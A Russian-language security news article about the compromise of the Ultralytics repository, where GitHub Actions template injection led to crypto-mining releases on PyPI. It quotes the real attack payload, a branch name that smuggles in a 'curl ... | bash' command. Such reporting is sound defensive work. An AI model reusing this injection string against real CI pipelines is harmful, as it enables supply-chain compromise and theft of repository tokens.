Контакты
Подписка 2025
ITSEC 2025
Интеграция безопасности в процессы внутренней разработки. 17-18 июня на Форуме ITSEC 2025
Регистрируйтесь и участвуйте!

Хакеры используют библиотеку Ultralytics на GitHub для майнинга криптовалюты

09/12/24

images (32)

Репозиторий Python-библиотеки Ultralytics, широко используемой в задачах компьютерного зрения, подвергся атаке , в результате которой злоумышленники получили возможность выполнять код с привилегиями обработчика GitHub Actions. Воспользовавшись этой уязвимостью, они разместили на PyPI вредоносные версии библиотеки, предназначенные для майнинга криптовалюты. Об этом пишет Securitylab.

Уязвимость была связана с пакетом ultralytics-actions, который автоматизирует запуск обработчиков при определённых действиях в репозитории. Для этого и используется механизм GitHub Actions. В проекте Ultralytics обработчик, привязанный к событию pull_request_target, вызывал файл format.yml для форматирования кода в поступающих pull-запросах. В этом файле выполнялись shell-команды с шаблонами подстановки, такими как:

git pull origin $

git config --global user.name "$"

git config --global user.email "$"

Злоумышленники отправили pull-запрос в репозиторий Ultralytics, указав в качестве имени ветки следующую строку:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Это привело к выполнению команды:

curl -sSfL raw.githubusercontent.com/.../file.sh | bash

В результате атакующие получили доступ к токенам репозитория и другим конфиденциальным данным. Предполагается, что они изменили обработчик publish.yml, убрав проверку учётной записи, с которой разрешено публиковать релизы на PyPI, и использовали технику отравления сборочного кэша GitHub Actions для внедрения своих данных в релиз.

Первый вредоносный релиз Ultralytics версии 8.3.41 был опубликован на PyPI 4 декабря в 23:51 (MSK) и удалён в 12:15 следующего дня. В 15:47 был размещён ещё один релиз 8.3.42, который удалили в 16:47. Таким образом, вредоносные версии были доступны для загрузки около 13 часов. В этих выпусках содержался код, загружающий с внешнего сервера компонент XMRig для майнинга.

Разработчики оперативно устранили проблему и выпустили исправления 8.3.43 и 8.3.44. Однако спустя два дня злоумышленники вновь опубликовали вредоносные версии 8.3.45 и 8.3.46, включающие другой код. До завершения расследования пользователям рекомендуют воздержаться от установки новых версий и зафиксировать в зависимостях выпуск 8.3.44.

Темы:майнингУгрозыGitHub
КИИ
Защита контейнеров и микросервисной разработки на Форуме ITSEC 2025
Регистрируйтесь и участвуйте 18 июня 2025 →
Статьи по темеСтатьи по теме

Участвуйте в проектах

редакции журнала
"Информационная безопасность" 

КАЛЕНДАРЬ МЕРОПРИЯТИЙ 2025
ПОСЕТИТЬ МЕРОПРИЯТИЯ
ВЫСТУПИТЬ НА КОНФЕРЕНЦИЯХ
СТАТЬ АВТОРОМ
ТБ Форум
Проектирование и защита API на Форуме ITSEC 2025
Посетите 17-18 июня →
Свежие новостиСвежие новости

Еще темы...

More...